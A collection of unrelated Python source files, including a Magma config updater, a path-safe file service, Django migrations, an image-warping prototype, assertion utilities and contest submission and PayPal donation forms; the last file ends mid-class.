def __init__(self, services: List[str], service_manager: ServiceManager,
magmad_service: MagmaService, mconfig_manager: MconfigManager,
allow_unknown_fields: bool = True, loop=None) -> None:
"""
Args:
services: List of services to manage
service_manager: ServiceManager instance
magmad_service: magmad service instance
mconfig_manager: manager class for the mconfig
allow_unknown_fields: set to True to suppress unknown field errors
loop: asyncio event loop to run in
"""
self._services = services
self._service_manager = service_manager
self._magmad_service = magmad_service
self._mconfig_manager = mconfig_manager
self._allow_unknown_fields = allow_unknown_fields
self._loop = loop or asyncio.get_event_loop()
# Load managed config
self._mconfig = self._mconfig_manager.load_mconfig()
def get_request_args(self, stream_name: str) -> Any:
# Include an mconfig digest argument to allow cloud optimization of
# not returning a non-updated mconfig.
digest = getattr(self._mconfig.metadata, 'digest', None)
if digest is None:
return None
mconfig_digest_proto = GatewayConfigsDigest(
md5_hex_digest=digest.md5_hex_digest)
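        # Illustrative effect: if the digest is unchanged server-side, the
        # cloud may return an empty update list, which process_update()
        # below treats as a no-op.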
return mconfig_digest_proto
def process_update(self, stream_name, updates, resync):
"""
Handle config updates. Resync is ignored since the entire config
structure is passed in every update.
Inputs:
- updates - list of GatewayConfigs protobuf structures
- resync - boolean indicating whether all database information will be
resent (hence cached data can be discarded). This is ignored
since config is contained in one DB element, hence all
data is sent in every update.
"""
if len(updates) == 0:
logging.info('No config update to process')
return
# We will only take the last update
for update in updates[:-1]:
logging.info('Ignoring config update %s', update.key)
# Deserialize and store the last config update
logging.info('Processing config update %s', updates[-1].key)
mconfig_str = updates[-1].value.decode()
mconfig = self._mconfig_manager.deserialize_mconfig(
mconfig_str,
self._allow_unknown_fields,
)
if 'magmad' not in mconfig.configs_by_key:
logging.error('Invalid config! Magmad service config missing')
return
self._mconfig_manager.update_stored_mconfig(mconfig_str)
self._magmad_service.reload_mconfig()
def did_mconfig_change(serv_name):
return mconfig.configs_by_key.get(serv_name) != \
self._mconfig.configs_by_key.get(serv_name)
# Reload magmad configs locally
if did_mconfig_change('magmad'):
self._loop.create_task(
self._service_manager.update_dynamic_services(
load_service_mconfig('magmad', mconfigs_pb2.MagmaD())
.dynamic_services,
)
)
services_to_restart = [
srv for srv in self._services if did_mconfig_change(srv)
]
if services_to_restart:
self._loop.create_task(
self._service_manager.restart_services(services_to_restart),
)
self._mconfig = mconfig
|
nilq/baby-python
|
python
|
# Not used
# Author : Satish Palaniappan
__author__ = "Satish Palaniappan"
import os, sys, inspect
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
from twokenize import *
import re
Code = r"\\[a-zA-Z0-9]+"
List = [
Url_RE,
Timelike,
Code
]
# stoplist = [")","(",".","'",",",";",":","?","/","!","@","$","*","+","-","_","=","&","%","`","~","\"","{","}"]
stopwords = [s.strip() for s in open(cmd_folder + "/stopwords","r").readlines()]
# print(stopwords)
### Not Implemented
def prep(text):
line = text
line = re.sub(r"[@#]", '', line)
for r in List:
line = re.sub(r," ", line)
for w in stopwords:
line = line.replace(" " + w.strip() + " "," ")
return line
def process(text):
# text = prep(text.strip().lower())
text = text.strip().lower()
text = u" ".join(tokenize(text))
return text.encode("utf-8")
|
nilq/baby-python
|
python
|
import json
import cv2.aruco as aruco
import numpy as np
with open("config.json", "r") as json_file:
data = json.load(json_file)
arucoDictionary = aruco.Dictionary_get(data["arucoDictionary"])
timeStep = data["timeStep"]
isLogEnabled = bool(data["logEnabled"])
markerWidth = data["markerWidth"]
camera = int(data["camera"])
actuators = data["actuators"]
gameDuration = data["gameDuration"]
device = data["device"]
minDistance = data["minDistance"]
maxDistance = data["maxDistance"]
frequencyClose = data["frequencyClose"]
frequencyOptimal = data["frequencyOptimal"]
frequencyFar = data["frequencyFar"]
actuatorRanges = data["actuatorRanges"]
targetLookAtThreshold = data["targetLookAtThreshold"]
dangerTime = data["dangerTime"]
shoulderMotors = data["shoulderMotors"]
motorInterval = data["motorInterval"]
resolutionX = data["resolutionX"]
resolutionY = data["resolutionY"]
distortCoeffs = np.array(data["distortCoeffs"])
focalLength = data["focalLength"]
camMatrix = np.array(data["camMatrix"])
camCenter = data["camCenter"]
calibrate = data["calibrate"]
useFisheye = data["useFisheye"]
deviceMode = int(data["deviceMode"])
usbPort = data["usbPort"]
catchThiefAfterTime = data["catchThiefAfterTime"]
buttonGpioPort= int(data["button_gpio_pin"])
def get_marker_id(side):
return data["markers"][side]
|
nilq/baby-python
|
python
|
import unittest
import younit
# @unittest.skip("skipped")
class CommonTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
async def async_setUp(self):
pass
async def async_tearDown(self):
pass
def setUp(self):
pass
def tearDown(self):
pass
def GIVEN_this(self):
pass
def WHEN_that(self):
pass
def THEN_verify(self):
pass
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import os
import pathlib
from .Decorators import Decorators
from ...Exceptions import AsyncyError
def safe_path(story, path):
"""
    safe_path fully resolves a path (e.g. ../../a/../b)
and returns an absolute path which can be used safely by prepending
the story's tmp dir. This ensures that the story cannot abuse the system
and write elsewhere, for example, stories.json.
:param story: The story (Stories object)
:param path: A path to be resolved
:return: The absolute path, which can be used to read/write directly
"""
story.create_tmp_dir()
# Adding the leading "/" is important, otherwise the current working
# directory will be used as the base path.
path = f'/{path}'
path = pathlib.Path(path).resolve()
return f'{story.get_tmp_dir()}{os.fspath(path)}'
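# Illustrative example (not executed): if story.get_tmp_dir() returned
# '/tmp/story-1', then safe_path(story, '../../etc/passwd') resolves
# '/../../etc/passwd' to '/etc/passwd' and returns
# '/tmp/story-1/etc/passwd' -- still inside the story's tmp dir.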
@Decorators.create_service(name='file', command='write', arguments={
'path': {'type': 'string'},
'content': {'type': 'any'}
})
async def file_write(story, line, resolved_args):
path = safe_path(story, resolved_args['path'])
try:
with open(path, 'w') as f:
f.write(resolved_args['content'])
except IOError as e:
raise AsyncyError(message=f'Failed to write to file: {e}',
story=story, line=line)
@Decorators.create_service(name='file', command='read', arguments={
'path': {'type': 'string'}
}, output_type='string')
async def file_read(story, line, resolved_args):
path = safe_path(story, resolved_args['path'])
try:
with open(path, 'r') as f:
return f.read()
except IOError as e:
raise AsyncyError(message=f'Failed to read file: {e}',
story=story, line=line)
@Decorators.create_service(name='file', command='exists', arguments={
'path': {'type': 'string'}
}, output_type='boolean')
async def file_exists(story, line, resolved_args):
path = safe_path(story, resolved_args['path'])
return os.path.exists(path)
def init():
pass
|
nilq/baby-python
|
python
|
# Generated by Django 3.1.2 on 2020-10-30 18:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('catalog', '0002_auto_20201030_1417'),
]
operations = [
migrations.RemoveField(
model_name='book',
name='language',
),
migrations.AddField(
model_name='book',
name='language',
field=models.ForeignKey(help_text='Select the language the book is written in.', null=True, on_delete=django.db.models.deletion.SET_NULL, to='catalog.language'),
),
]
|
nilq/baby-python
|
python
|
import logging
from application.utils import globals
from application.utils.helpers import Singleton
from pymongo import MongoClient, ASCENDING, DESCENDING
@Singleton
class Connection:
_client = None
db = None
def __init__(self):
try:
self._client = MongoClient(globals.configuration.mongo['uri'])
self.db = self._client[globals.configuration.mongo['db']]
self.generate_structure()
        except Exception as error:
logging.error('DB error: %s' % error.message)
raise error
def generate_structure(self):
"""
Create indexes
:return:
"""
try:
self.db.twitter.ensure_index([('created', DESCENDING)], name='_date_index1', background=True)
self.db.twitter.ensure_index([('source', ASCENDING)], name='_source_index1', background=True)
self.db.twitter.ensure_index([('hashtags', ASCENDING)], name='_hashtags_index1', background=True)
self.db.twitter.ensure_index([('user', ASCENDING)], name='_user_index1', background=True)
        except Exception as error:
logging.error('Error during index creation: %s' % error.message)
raise error
|
nilq/baby-python
|
python
|
# Copyright (c) 2019 - The Procedural Generation for Gazebo authors
# For information on the respective copyright owner see the NOTICE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..types import XMLBase
from .size import Size
from .normal import Normal
class Plane(XMLBase):
_NAME = 'plane'
_TYPE = 'sdf'
_CHILDREN_CREATORS = dict(
size=dict(creator=Size, default=[2]),
normal=dict(creator=Normal)
)
def __init__(self):
XMLBase.__init__(self)
self.reset()
@property
def size(self):
return self._get_child_element('size')
@size.setter
def size(self, vec):
self._add_child_element('size', vec)
@property
def normal(self):
return self._get_child_element('normal')
@normal.setter
def normal(self, vec):
self._add_child_element('normal', vec)
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.5 on 2019-11-21 01:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Search',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('query', models.CharField(max_length=100)),
('search_count', models.PositiveIntegerField(default=1)),
('timestamp', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': 'Search',
'verbose_name_plural': 'searches',
},
),
]
|
nilq/baby-python
|
python
|
import os
import sys
import tempfile
import mimetypes
import webbrowser
# Import the email modules we'll need
from email import policy
from email.parser import BytesParser
# An imaginary module that would make this work and be safe.
from imaginary import magic_html_parser
# In a real program you'd get the filename from the arguments.
msg = BytesParser(policy=policy.default).parse(open('outgoing.msg', 'rb'))
# Now the header items can be accessed as a dictionary, and any non-ASCII will
# be converted to unicode:
print('To:', msg['to'])
print('From:', msg['from'])
print('Subject:', msg['subject'])
# If we want to print a preview of the message content, we can extract whatever
# the least formatted payload is and print the first three lines. Of course,
# if the message has no plain text part printing the first three lines of html
# is probably useless, but this is just a conceptual example.
simplest = msg.get_body(preferencelist=('plain', 'html'))
print()
print(''.join(simplest.get_content().splitlines(keepends=True)[:3]))
ans = input("View full message?")
if ans.strip().lower()[:1] == 'n':
sys.exit()
# We can extract the richest alternative in order to display it:
richest = msg.get_body()
partfiles = {}
if richest['content-type'].maintype == 'text':
if richest['content-type'].subtype == 'plain':
for line in richest.get_content().splitlines():
print(line)
sys.exit()
elif richest['content-type'].subtype == 'html':
body = richest
else:
print("Don't know how to display {}".format(richest.get_content_type()))
sys.exit()
elif richest['content-type'].content_type == 'multipart/related':
    body = richest.get_body(preferencelist=('html',))
for part in richest.iter_attachments():
fn = part.get_filename()
if fn:
extension = os.path.splitext(part.get_filename())[1]
else:
extension = mimetypes.guess_extension(part.get_content_type())
with tempfile.NamedTemporaryFile(suffix=extension, delete=False) as f:
f.write(part.get_content())
# again strip the <> to go from email form of cid to html form.
partfiles[part['content-id'][1:-1]] = f.name
else:
print("Don't know how to display {}".format(richest.get_content_type()))
sys.exit()
with tempfile.NamedTemporaryFile(mode='w', delete=False) as f:
# The magic_html_parser has to rewrite the href="cid:...." attributes to
# point to the filenames in partfiles. It also has to do a safety-sanitize
# of the html. It could be written using html.parser.
f.write(magic_html_parser(body.get_content(), partfiles))
webbrowser.open(f.name)
os.remove(f.name)
for fn in partfiles.values():
os.remove(fn)
# Of course, there are lots of email messages that could break this simple
# minded program, but it will handle the most common ones.
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
My first warp!
Using scikit-image piecewise affine transformation,
based on manual node assignment with stable corners.
A midpoint morph (halfway between the key frames) is generated.
http://scikit-image.org/docs/dev/auto_examples/plot_piecewise_affine.html
"""
############
# Settings #
############
home = r'/Users/jasper/Documents/PythonSpul/muddymorph/testcases'
key_a = home + r'/ball1.jpg'
key_b = home + r'/ball2.jpg'
nodefile = home + r'/ball_nodeclick.csv'
################
# Dependencies #
################
# Open source
import numpy as np
import matplotlib.pyplot as plt
from skimage.transform import PiecewiseAffineTransform, warp
# Home grown
import muddymorph_algo as algo
########
# Warp #
########
# Make an announcement
print("")
print("MuddyMorph Warp Proto 1")
print("=======================")
print("")
# Load data
print("Loading images and coordinates ... ", end="")
Ka = algo.load_rgba(key_a)
Kb = algo.load_rgba(key_b)
h, w = Ka.shape[:2]
nodes = np.loadtxt(nodefile, delimiter=',').astype(int)
print("done")
# Add edges to node paths
for x in [0, w - 1]:
for y in [0, h - 1]:
nodes = np.row_stack((nodes, [x, y, x, y]))
# Source and destination coordinates
print("Warping like crazy ... ", end="")
pa = nodes[:, 0:2]
pb = nodes[:, 2:4]
pi = pa + 0.5 * (pb - pa)
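# Note: skimage's warp() applies the given transform as an *inverse* map
# (output pixel -> input pixel), so estimating pi -> pa below makes the
# warped A image place key frame A's features at the midpoint positions.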
# Transform A
Ta = PiecewiseAffineTransform()
Ta.estimate(pi, pa)
Wa = warp(Ka, Ta)
# Transform B
Tb = PiecewiseAffineTransform()
Tb.estimate(pi, pb)
Wb = warp(Kb, Tb)
print("done")
##########
# Review #
##########
# Show plain images
print("Plotting input ... ", end="")
plt.close('all')
fig = algo.big_figure('MuddyMorph Proto - Warp 1', w * 3, h * 2)
plt.subplot(2, 3, 1)
plt.imshow(Ka)
plt.axis('image')
plt.plot(nodes[:, 0], nodes[:, 1], 'r+')
plt.title('A plain', fontweight='bold')
plt.subplot(2, 3, 2)
plt.imshow(Kb)
plt.axis('image')
plt.plot(nodes[:, 2], nodes[:, 3], 'r+')
plt.title('B plain', fontweight='bold')
plt.subplot(2, 3, 3)
plt.imshow(0.5 * Ka + 0.5 * Kb)
plt.axis('image')
plt.title('A&B plain', fontweight='bold')
print("done")
# Show warped images
print("Plotting result ... ", end="")
plt.subplot(2, 3, 4)
plt.imshow(Wa)
plt.axis('image')
plt.plot(pi[:, 0], pi[:, 1], 'r+')
plt.title('A warp', fontweight='bold')
plt.subplot(2, 3, 5)
plt.imshow(Wb)
plt.axis('image')
plt.plot(pi[:, 0], pi[:, 1], 'r+')
plt.title('B warp', fontweight='bold')
plt.subplot(2, 3, 6)
plt.imshow(0.5 * Wa + 0.5 * Wb)
plt.axis('image')
plt.title('A&B plain', fontweight='bold')
print("done")
|
nilq/baby-python
|
python
|
# Copyright (c) 2006-2013 Regents of the University of Minnesota.
# For licensing terms, see the file LICENSE.
import os
import sys
import re
import traceback
# This is the global namespace.
# 2011.04.19: g.log is the only member of the global namespace. I think there
# were bigger plans for g.py, but it's only ever housed the logger.
# See: conf.py, which sets g.log = logging.
# 2011.08.19: Import pyserver_glue so we get os.environ['PYSERVER_HOME'].
# 2013.04.20: pyserver_glue no longer sets os.environ['PYSERVER_HOME'], but
# we no longer use it. Also, it should still be the first element
# of sys.path[].
import pyserver_glue
# 2011.01.23: Adding g.assurt so we can show a proper stack trace
ignore_stack_re = re.compile(r'^\s*raise Ccp_Assert\(message\)$')
class Ccp_Assert(AssertionError):
def __init__(self, message):
if not message:
# NO! prints to stderr or something: message = traceback.print_stack()
#message = traceback.format_exc()
strip_stack = False
stack_lines_ = traceback.format_stack()
stack_lines = []
for lines in stack_lines_:
for line in lines.split('\n'):
if line:
#log.debug('Ccp_Assert: line: %s' % (line,))
if ignore_stack_re.match(line) is not None:
#import pdb; pdb.set_trace()
# "raise Ccp_Assert(message)" is actually secondtolast ln
# The line before is, e.g.,
# File "/ccp/dev/cp_1051/pyserver/g.py", ln 36, in assurt
try:
stack_lines.pop()
except IndexError:
log.error('Ccp_Assert: empty list?')
strip_stack = True
break
stack_lines.append(line)
if strip_stack:
break
message = '\n'.join(stack_lines)
#Exception.__init__(self, message)
AssertionError.__init__(self, message)
#log.error('Ccp_Assert: %s' % (message,))
#traceback.print_exception(*sys.exc_info())
debug_me = False
#debug_me = True
# FIXME: Should we check either of these, i.e., for cron jobs?
#Apr-20 20:40:20 DEBG schema-up # os.getenv("LOGNAME"): landonb
#Apr-20 20:40:20 DEBG schema-up # os.environ.get("TERM"): xterm
# From pyserver, Fedora:
# os.getenv('LOGNAME') is None
# os.getenv('TERM') is 'xterm'
# {'LANG': 'C',
# 'TERM': 'xterm',
# 'SHLVL': '2',
# 'INSTANCE': 'minnesota',
# 'PWD': '/',
# 'PYSERVER_HOME': '/ccp/dev/cp_nnnn/pyserver',
# 'PATH': '/sbin:/usr/sbin:/bin:/usr/bin',
# '_': '/usr/sbin/httpd'}
iamwhoiam = True
# NOTE: os.getenv same as os.environ.get. Type os.environ to see all.
if ((os.getenv('APACHE_RUN_USER') == 'www-data') # Ubuntu apache service
or (os.getenv('_') == '/usr/sbin/httpd') # Fedora apache service
or (os.getenv('LOGNAME') == 'www-data') # Ubuntu routed/mr_do service
or (os.getenv('LOGNAME') == 'apache')): # Fedora routed/mr_do service
# FIXME: What are the mr_do/routed services under Ubuntu?
iamwhoiam = False
# NOTE: If starting as a service, cannot import rpdb2 here.
# 'cause the cwd is '.'. After pyserver_glue runs, it'll
# be corrected, so the import is in the assurt fcn.
# The 'assert' keyword is reserved, so we call it, uh, 'syrt!
def assurt(condit, message=None, soft=False):
if not bool(condit):
# FIXME: This doesn't work if being run as a service. Can you figure out
# if we're a daemon and throw a normal assert instead?
if debug_me:
log.warning('DEBUGGING!!')
print 'DEBUGGING!!'
if iamwhoiam:
import pdb; pdb.set_trace()
else:
log.warning('Waiting for remote debug client...')
print 'Waiting for remote debug client...'
import rpdb2
rpdb2.start_embedded_debugger('password', fAllowRemote=True)
assrt = Ccp_Assert(message)
if not soft:
raise assrt
else:
log.error('Soft Assert: %s' % (str(assrt),))
#
def assurt_soft(condit, message=None):
assurt(condit, message, soft=True)
#
# Some debugging hints:
#
# Start the remote debugger
# -------------------------
#
# In one terminal window,
#
# $ cd /ccp/dev/cp/pyserver/bin/winpdb ; py rpdb2.py
# > password password
#
# In your code, start a debug session where you want to break,
#
# import rpdb2
# rpdb2.start_embedded_debugger('password', fAllowRemote=True)
#
# And then back in your terminal window, find the list of
# waiting sessions,
#
# > attach
# Connecting to 'localhost'...
# Scripts to debug on 'localhost':
#
# pid name
# --------------------------
# 28969 /ccp/dev/cp/pyserver/g.py
#
# > attach 28969
# ...
#
# Start a local debugger
# ----------------------
#
# If you're just running a script (and not pyserver via apache),
# insert a simple pdb break into your code,
#
# import pdb;pdb.set_trace()
#
# You can also use a safer, user-specific mechanism, e.g.,
#
# conf.break_here('ccpv3')
#
# ***
class Ccp_Shutdown(Exception):
'''An error telling the code to cleanup as quickly as possible.'''
def __init__(self, message=''):
Exception.__init__(self, message)
#
def check_keep_running(keep_running):
if (keep_running is not None) and (not keep_running.isSet()):
raise Ccp_Shutdown()
# ***
if (__name__ == '__main__'):
pass
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
""" contest forms: HTTP form processing for contest pages
:copyright: Copyright (c) 2014 Bivio Software, Inc. All Rights Reserved.
:license: Apache, see LICENSE for more details.
"""
import decimal
import re
import sys
import flask
import flask_mail
import flask_wtf
import paypalrestsdk
import paypalrestsdk.exceptions
import wtforms
import wtforms.validators as wtfv
from . import model as pcm
from .. import common
from .. import controller as ppc
from ..auth import model as pam
class Contestant(flask_wtf.Form):
"""Project submission form.
Fields:
display_name: project name
contestant_desc: project summary
youtube_url: full YouTube video url
slideshow_url: full SlideShare url
founder_desc: current user's founder info for this project
website: project website (optional)
"""
display_name = wtforms.StringField(
'Legal Name of Business', validators=[
wtfv.DataRequired(), wtfv.Length(max=100)])
contestant_desc = wtforms.TextAreaField(
'Summary of Business, Product and/or Service',
validators=[wtfv.DataRequired(), wtfv.Length(max=10000)])
youtube_url = wtforms.StringField(
'YouTube Video URL', validators=[
wtfv.DataRequired(), wtfv.Length(max=500)])
slideshow_url = wtforms.StringField(
'SlideShare Pitch Deck URL', validators=[
wtfv.DataRequired(), wtfv.Length(max=500)])
founder_desc = wtforms.TextAreaField(
'Your Bio', validators=[wtfv.DataRequired(), wtfv.Length(max=10000)])
website = wtforms.StringField(
'Business Website', validators=[wtfv.Length(max=100)])
tax_id = wtforms.StringField(
'Business US Tax Id', validators=[
wtfv.DataRequired(), wtfv.Length(max=30)])
business_phone = wtforms.StringField(
'Business Phone', validators=[
wtfv.DataRequired(), wtfv.Length(max=100)])
business_address = wtforms.TextAreaField(
'Business Mailing Address', validators=[
wtfv.DataRequired(), wtfv.Length(max=500)])
agree_to_terms = wtforms.BooleanField(
'Agree to Terms of Service', validators=[wtfv.DataRequired()])
founder2_name = wtforms.StringField(
'Other Founder Name', validators=[wtfv.Length(max=100)])
founder2_desc = wtforms.TextAreaField(
'Other Founder Bio', validators=[wtfv.Length(max=10000)])
founder3_name = wtforms.StringField(
'Other Founder Name', validators=[wtfv.Length(max=100)])
founder3_desc = wtforms.TextAreaField(
'Other Founder Bio', validators=[wtfv.Length(max=10000)])
def execute(self, contest):
"""Validates and creates the contestant model"""
if self.is_submitted() and self.validate():
contestant = self._update_models(contest)
if contestant:
self._send_mail_to_support(contestant)
flask.flash(
'Thank you for submitting your entry. You will be '
'contacted by email when your entry has been reviewed.')
return flask.redirect(contest.format_uri('contestants'))
return contest.task_class.get_template().render_template(
contest,
'submit',
form=self,
selected_menu_action='submit-contestant'
)
def validate(self):
"""Performs superclass wtforms validation followed by url
field validation"""
super(Contestant, self).validate()
self._validate_youtube()
self._validate_slideshare()
self._validate_website()
common.log_form_errors(self)
return not self.errors
def _add_founder(self, contestant, founder):
"""Creates the founder and links it to the contestant."""
ppc.db.session.add(founder)
ppc.db.session.flush()
ppc.db.session.add(
pam.BivAccess(
source_biv_id=contestant.biv_id,
target_biv_id=founder.biv_id
)
)
def _add_founders(self, contestant):
"""Add the current user as a founder and any optional founders."""
founder = pcm.Founder()
self.populate_obj(founder)
founder.display_name = flask.session['user.display_name']
self._add_founder(contestant, founder)
ppc.db.session.add(
pam.BivAccess(
source_biv_id=flask.session['user.biv_id'],
target_biv_id=founder.biv_id
)
)
if self.founder2_name.data:
self._add_founder(contestant, pcm.Founder(
display_name=str(self.founder2_name.data),
founder_desc=str(self.founder2_desc.data),
))
if self.founder3_name.data:
self._add_founder(contestant, pcm.Founder(
display_name=str(self.founder3_name.data),
founder_desc=str(self.founder3_desc.data),
))
def _send_mail_to_support(self, contestant):
"""Send a notification to support for a new entry"""
ppc.mail().send(flask_mail.Message(
'New Entry Submitted: {}'.format(contestant.biv_id),
recipients=[ppc.app().config['PUBLICPRIZE']['SUPPORT_EMAIL']],
# TODO(pjm): requires new Flask-Mail for unicode on python 3
# body='Submitted by: {} {}\nTitle: {}\nReview URL: {}'.format(
# flask.session['user.display_name'],
# pam.User.query.filter_by(
# biv_id=flask.session['user.biv_id']
# ).one().user_email,
# contestant.display_name,
# contestant.format_absolute_uri()
# )
body='Submitted by: {}\nReview URL: {}'.format(
pam.User.query.filter_by(
biv_id=flask.session['user.biv_id']
).one().user_email,
contestant.format_absolute_uri()
)
))
def _slideshare_code(self):
"""Download slideshare url and extract embed code.
The original url may not have the code.
ex. www.slideshare.net/Micahseff/game-xplain-pitch-deck-81610
Adds field errors if the code can not be determined.
"""
html = common.get_url_content(self.slideshow_url.data)
if not html:
self.slideshow_url.errors = [
'SlideShare URL invalid or unavailable.']
return None
match = re.search(r'slideshow/embed_code/(\d+)', html)
if match:
return match.group(1)
self.slideshow_url.errors = [
'Embed code not found on SlideShare page.']
return None
def _update_models(self, contest):
"""Creates the Contestant and Founder models
and adds BivAccess models to join the contest and Founder models"""
contestant = pcm.Contestant()
self.populate_obj(contestant)
contestant.youtube_code = self._youtube_code()
contestant.slideshow_code = self._slideshare_code()
contestant.is_public = \
ppc.app().config['PUBLICPRIZE']['ALL_PUBLIC_CONTESTANTS']
contestant.is_under_review = False
ppc.db.session.add(contestant)
ppc.db.session.flush()
ppc.db.session.add(
pam.BivAccess(
source_biv_id=contest.biv_id,
target_biv_id=contestant.biv_id
)
)
self._add_founders(contestant)
return contestant
def _youtube_code(self):
"""Ensure the youtube url contains a VIDEO_ID"""
value = self.youtube_url.data
# http://youtu.be/a1Y73sPHKxw
# or https://www.youtube.com/watch?v=a1Y73sPHKxw
if re.search(r'\?', value) and re.search(r'v\=', value):
match = re.search(r'(?:\?|\&)v\=(.*?)(&|$)', value)
if match:
return match.group(1)
else:
match = re.search(r'\/([^\&\?\/]+)$', value)
if match:
return match.group(1)
return None
def _validate_slideshare(self):
"""Ensures the SlideShare slide deck exists"""
if self.slideshow_url.errors:
return
code = self._slideshare_code()
if code:
if not common.get_url_content(
'http://www.slideshare.net/slideshow/embed_code/' + code):
self.slideshow_url.errors = [
'Unknown SlideShare ID: ' + code + '.']
def _validate_website(self):
"""Ensures the website exists"""
if self.website.errors:
return
if self.website.data:
if not common.get_url_content(self.website.data):
self.website.errors = ['Website invalid or unavailable.']
def _validate_youtube(self):
"""Ensures the YouTube video exists"""
if self.youtube_url.errors:
return
code = self._youtube_code()
if code:
html = common.get_url_content('http://youtu.be/' + code)
# TODO(pjm): need better detection for not-found page
if not html or re.search(r'<title>YouTube</title>', html):
self.youtube_url.errors = [
'Unknown YouTube VIDEO_ID: ' + code + '.']
else:
self.youtube_url.errors = ['Invalid YouTube URL.']
class Donate(flask_wtf.Form):
"""Donation form.
Fields:
amount: donation amount
"""
# TODO(pjm): DecimalField doesn't accept '' value...
amount = wtforms.StringField('Contribution Amount')
donate5 = wtforms.SubmitField('$5')
donate25 = wtforms.SubmitField('$25')
donate100 = wtforms.SubmitField('$100')
other_amount = wtforms.SubmitField('Other Amount')
def execute(self, contestant):
"""Validates and redirects to PayPal
For test credit card payments, use card number: 4736656842918643
"""
if self.is_submitted() and self.validate():
url = self._paypal_payment(contestant)
if url:
return flask.redirect(url)
contest = contestant.get_contest()
return contest.task_class.get_template().render_template(
contest,
'detail',
contestant=contestant,
contestant_url=contestant.format_absolute_uri(),
contestant_tweet="Help us win! " + contestant.display_name,
form=self,
)
def execute_payment(self, contestant):
"""Handles return task from paypal. Calls paypal with payment and
payer IDs to complete the transaction."""
donor = pcm.Donor.unsafe_load_from_session()
if not donor:
ppc.app().logger.warn('missing session donor')
flask.flash('The referenced contribution was already processed.')
return flask.redirect(contestant.format_uri())
self._save_payment_info_to_donor(donor)
payment = paypalrestsdk.Payment({
'id': donor.paypal_payment_id
})
donor.remove_from_session()
try:
if payment.execute({'payer_id': donor.paypal_payer_id}):
donor.donor_state = 'executed'
ppc.db.session.add(donor)
return flask.redirect(contestant.format_uri('thank-you'))
else:
ppc.app().logger.warn('payment execute failed')
except paypalrestsdk.exceptions.ClientError as err:
ppc.app().logger.warn(err)
except:
ppc.app().logger.warn(sys.exc_info()[0])
return flask.redirect(contestant.format_uri())
def validate(self):
"""Ensure the amount is present and at least $10"""
super(Donate, self).validate()
amount = None
if self.donate5.data:
amount = 5
elif self.donate25.data:
amount = 25
elif self.donate100.data:
amount = 100
elif self.amount.data:
try:
if float(self.amount.data) < 10:
self.amount.errors = ['Amount must be at least $10.']
elif float(self.amount.data) > 1000000:
self.amount.errors = ['Amount too large.']
except ValueError:
self.amount.errors = ['Please enter an amount.']
else:
self.amount.errors = ['Please enter an amount.']
self.amount.raw_data = None
if amount:
self.amount.data = decimal.Decimal(amount)
common.log_form_errors(self)
return not self.errors
def _create_donor(self, contestant):
"""Create a new donor model and link to the parent contestant."""
donor = pcm.Donor()
self.populate_obj(donor)
donor.donor_state = 'submitted'
ppc.db.session.add(donor)
ppc.db.session.flush()
ppc.db.session.add(
pam.BivAccess(
source_biv_id=contestant.biv_id,
target_biv_id=donor.biv_id
)
)
return donor
def _link_donor_to_user(self, donor):
"""Link the donor model to a user model. Match the donor email with
the user. If no match, use the current user, if present."""
if pam.BivAccess.query.select_from(pam.User).filter(
pam.BivAccess.source_biv_id == pam.User.biv_id,
pam.BivAccess.target_biv_id == donor.biv_id
).count() > 0:
return
user = pam.User.query.filter_by(user_email=donor.donor_email).first()
if not user and flask.session.get('user.is_logged_in'):
user = pam.User.query.filter_by(
biv_id=flask.session['user.biv_id']
).one()
if not user:
return
ppc.db.session.add(
pam.BivAccess(
source_biv_id=user.biv_id,
target_biv_id=donor.biv_id
)
)
def _paypal_payment(self, contestant):
"""Call paypal server to create payment record.
Returns a redirect link to paypal site or None on error."""
donor = self._create_donor(contestant)
amount = '%.2f' % float(self.amount.data)
payment = paypalrestsdk.Payment({
'intent': 'sale',
'payer': {
'payment_method': 'paypal'
},
'redirect_urls': {
'return_url': contestant.format_absolute_uri('donate-done'),
'cancel_url': contestant.format_absolute_uri('donate-cancel'),
},
'transactions': [
{
'amount': {
'total': amount,
'currency': 'USD',
},
'item_list': {
'items': [
{
'quantity': 1,
'price': amount,
'currency': 'USD',
'name': '{} contribution, {}'.format(
contestant.display_name,
contestant.get_contest().display_name),
'tax': 0
}
]
}
}
]
})
try:
if payment.create():
ppc.app().logger.info(payment)
donor.paypal_payment_id = str(payment.id)
donor.add_to_session()
for link in payment.links:
if link.method == 'REDIRECT':
return str(link.href)
else:
ppc.app().logger.warn(payment.error)
except paypalrestsdk.exceptions.ClientError as err:
ppc.app().logger.warn(err)
except:
ppc.app().logger.warn(sys.exc_info()[0])
self.amount.errors = [
'There was an error processing your contribution.']
return None
def _save_payment_info_to_donor(self, donor):
"""Get payer info from paypal server, save info to Donor model."""
try:
payment = paypalrestsdk.Payment.find(donor.paypal_payment_id)
info = payment.payer.payer_info
donor.donor_email = info.email
donor.display_name = info.first_name + ' ' + info.last_name
except paypalrestsdk.exceptions.ConnectionError as err:
ppc.app().logger.warn(err)
donor.paypal_payer_id = flask.request.args['PayerID']
donor.donor_state = 'pending_confirmation'
ppc.db.session.add(donor)
self._link_donor_to_user(donor)
class Judgement(flask_wtf.Form):
"""Judgement form.
Fields:
question(1 .. 6): question score
question(1 ..6)_comment: comments for survey question
general_comment: End of survey comments
"""
def _comment_field(label='Comments'):
return wtforms.TextAreaField(
